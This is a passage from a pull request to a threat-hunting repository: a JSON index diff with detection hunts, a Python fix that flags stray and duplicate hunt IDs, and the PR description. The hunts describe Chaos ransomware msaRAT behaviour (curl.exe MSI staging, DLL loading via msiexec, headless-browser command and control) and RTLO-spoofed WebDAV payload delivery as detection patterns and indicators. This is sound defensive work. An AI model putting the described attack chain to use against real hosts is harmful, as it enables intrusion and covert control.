`Runtime.evaluate`. Strong red flags: callbacks or binding names such as `msaOpen`, `msaClose`, `msaError`, `msaMessage`, or `dataAck`.\n\nProcess-owned network telemetry - Core filter: headless Chrome or Edge making external signaling and WebRTC traffic shortly after local RAT execution. Triage values: `process name`, `process command line`, `destination domain`, `destination IP address`, `user agent`, `parent process name`. Correlation: browser traffic to `workers.dev` style signaling, `HeadlessChrome` user agent, then TURN relay traffic such as `global.turn.twilio.com` after a local debugging session. False positive: browser automation and QA systems can use remote debugging, but they should not follow `curl.exe` MSI staging, `lib.dll` load, and local malware-to-browser control on an end-user host.\n",
+    "tags": [
+      "chaos_ransomware",
+      "msarat",
+      "chrome_devtools_protocol",
+      "webrtc",
+      "msi",
+      "headless_browser",
+      "T1105",
+      "T1218.007",
+      "T1059.003",
+      "T1090",
+      "T1071.001"
+    ],
+    "techniques": [
+      "T1105",
+      "T1218.007",
+      "T1059.003",
+      "T1090",
+      "T1071.001"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Joshua Strickland",
+      "link": "https://novasky.io"
+    },
+    "why": "- Talos tied this behavior to active Chaos ransomware operations and named concrete artifacts: `update_ms.msi`, `C:\\ProgramData\\update_ms.msi`, `lib.dll`, and CDP binding names such as `msaOpen` and `msaMessage`.\n- The hunt survives IP and domain rotation because the RAT still has to stage an MSI, load the embedded DLL, start a headless browser, and control it through a local debugging channel.\n- MDR teams can observe the chain with standard endpoint telemetry: process creation, file creation, module loads, browser command lines, localhost connections, and process-owned network metadata.\n- False positives are controllable because benign browser automation is not expected to appear immediately after `curl.exe` writes an MSI into `ProgramData` and `msiexec.exe` loads a payload DLL.",
+    "references": "- [Cisco Talos: Chaos ransomware msaRAT browser C2](https://blog.talosintelligence.com/chaos-msarat-living-off-the-browser-to-build-covert-c2-channel/)\n- [MITRE ATT&CK T1105 Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)\n- [MITRE ATT&CK T1218.007 Msiexec](https://attack.mitre.org/techniques/T1218/007/)\n- [MITRE ATT&CK T1090 Proxy](https://attack.mitre.org/techniques/T1090/)\n- [MITRE ATT&CK T1071.001 Web Protocols](https://attack.mitre.org/techniques/T1071/001/)",
+    "file_path": "Flames/H240.md",
+    "created": "2026-07-25T22:17:55-05:00"
+  },
+  {
     "id": "H241",
     "category": "Flames",
     "title": "WMI permanent event subscription persistence executing a script interpreter or LOLBin",
@@ -8333,7 +8371,7 @@
     "why": "- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.\n- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.\n- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.\n- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.",
     "references": "- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)\n- [dfir.ch: Abusing the \"search-ms\" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)\n- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)\n- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)\n- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)",
     "file_path": "Flames/H244.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   },
   {
     "id": "M001",

--- a/scripts/rebuild_hunts_data.py
+++ b/scripts/rebuild_hunts_data.py
@@ -5,9 +5,17 @@ No external dependencies — pure stdlib.
 """
 
 import json
+import re
 import subprocess
 import sys
 from pathlib import Path
+
+# A hunt markdown file: H### (Flames), B### (Embers), M### (Alchemy).
+HUNT_FILE_RE = re.compile(r"^[HBM]\d+\.md$")
+
+# Directories that legitimately contain no hunts; skipped when scanning for
+# hunt files that have been filed outside a category directory.
+NON_HUNT_DIRS = {".git", ".github", "node_modules", ".venv", "public", "scripts", "assets", "docs"}
 
 _REPO_ROOT = str(Path(__file__).resolve().parent.parent)
 if _REPO_ROOT not in sys.path:
@@ -115,11 +123,46 @@ def parse_submitter_from_dict(submitter):
     return {"name": name or "Anonymous", "link": submitter.get("link", "")}
 
 
+def find_stray_hunts(base, categories):
+    """Hunt files sitting outside the canonical category directories.
+
+    These are invisible to this indexer, so they never reach hunts-data.json —
+    and anything deriving the next free hunt ID from that index will hand out a
+    number that is already taken. This is exactly how H240 came to be used
+    twice: one hunt was filed under `Command and Control/` (a MITRE tactic, not
+    a HEARTH category), so it was never indexed and its ID looked free.
+    """
+    stray = []
+    for path in sorted(base.rglob("*.md")):
+        if not HUNT_FILE_RE.match(path.name):
+            continue
+        rel = path.relative_to(base)
+        top = rel.parts[0]
+        if top in categories or top in NON_HUNT_DIRS or top.startswith("."):
+            continue
+        stray.append(rel)
+    return stray
+
+
 def main():
     base = Path(__file__).parent.parent
     categories = {"Flames": "Flames", "Embers": "Embers", "Alchemy": "Alchemy"}
 
+    stray = find_stray_hunts(base, categories)
+    if stray:
+        print("ERROR: hunt files found outside the category directories:", file=sys.stderr)
+        for rel in stray:
+            print(f"  {rel}", file=sys.stderr)
+        print(
+            "\nThese never get indexed, so their IDs look free and get reissued.\n"
+            f"Move each into one of: {', '.join(sorted(categories))} "
+            "(and set its `category:` frontmatter to match).",
+            file=sys.stderr,
+        )
+        sys.exit(1)
+
     all_hunts = []
+    id_sources = {}
     for dirname, cat_name in categories.items():
         cat_dir = base / dirname
         if not cat_dir.exists():
@@ -128,7 +171,18 @@ def main():
             hunt = parse_hunt_file(md, cat_name)
             if hunt:
                 all_hunts.append(hunt)
+                id_sources.setdefault(hunt["id"], []).append(str(md.relative_to(base)))
                 print(f"  Parsed {hunt['id']}")
+
+    # Two hunts claiming one ID means whichever sorts last silently wins in the
+    # index, and the site renders one of them under the other's number.
+    duplicates = {hid: paths for hid, paths in id_sources.items() if len(paths) > 1}
+    if duplicates:
+        print("ERROR: duplicate hunt IDs:", file=sys.stderr)
+        for hid, paths in sorted(duplicates.items()):
+            print(f"  {hid}: {', '.join(paths)}", file=sys.stderr)
+        print("\nRenumber one of each pair to the next free ID.", file=sys.stderr)
+        sys.exit(1)
 
     all_hunts.sort(key=lambda x: x["id"])
 


### PR DESCRIPTION
## Source articles
- [From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/) — Rapid7, 2026-07-20
- [RATatouille: Cooking Up Chaos in the I2P Kitchen](https://www.sekoia.com/blog/ratatouille-cooking-up-chaos-in-the-i2p-kitchen) — Sekoia TDR
- [PikaBot: a Guide to its Deep Secrets and Operations](https://www.sekoia.com/blog/pikabot-a-guide-to-its-deep-secrets-and-operations) — Sekoia TDR
- [Russian Global Webmail Espionage](https://unit42.paloaltonetworks.com/russian-webmail-espionage/) — Unit 42 (Palo Alto Networks), 2026-07-23
- [AA26-204A: Russian State-Supported Phishing Targeting Zimbra Collaboration Suite Users](https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-204a) — CISA, 2026-07-23

## New hunts

### From "Inside an Exposed WebDAV Malware Delivery Lab" (Rapid7)
- [H244](Flames/H244.md) — Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms (T1036.007)
- [H241](Flames/H241.md) — WMI permanent event subscription persistence executing a script interpreter / LOLBin (T1546.003)
- [B032](Embers/B032.md) — Baseline of legitimate WMI permanent event subscriptions to surface rogue consumers (T1546.003)
- [H243](Flames/H243.md) — UAC bypass via auto-elevating binary + HKCU shell-open-command hijack (fodhelper / computerdefaults / wsreset) (T1548.002)

### From "RATatouille" (Sekoia) & "PikaBot" (Sekoia)
- [H242](Flames/H242.md) — Malware self-debugging and debug-register / debugger-process checks to block analysis (T1622)

### From "Russian Global Webmail Espionage" (Unit 42) & CISA AA26-204A
- [M029](Alchemy/M029.md) — Anomalous mail-data egress volume from the webmail tier to first-seen external domains (T1048.003)

## Category breakdown
- Flames: 4 · Embers: 1 · Alchemy: 1


## Also in this PR: hunt-ID integrity fix

`H240` was issued twice. `Command and Control/H240.md` (Chaos msaRAT, #356) sits outside the three category directories, so `scripts/rebuild_hunts_data.py` never indexed it — its ID looked free and got reissued.

- **`Command and Control/H240.md` → `Flames/H240.md`**, with `category:` corrected from `Command and Control` (a MITRE tactic, not a HEARTH category) to `Flames`. The ID is unchanged, so the hunt keeps its identity; only its path moves.
- **`scripts/rebuild_hunts_data.py` now fails loudly** on any hunt file outside `Flames/`, `Embers/`, `Alchemy/`, and on any ID claimed by two files — instead of silently emitting an index that omits one of them. Both checks were confirmed to exit non-zero on a seeded failure and zero on a clean tree.

Heads-up for maintainers: **#355 is affected by the same problem** — it adds `Flames/H239.md`, but `H239` is already merged as "Starland RAT launching WLDR tasking from pythonw LICENSE.txt". It needs renumbering before merge.
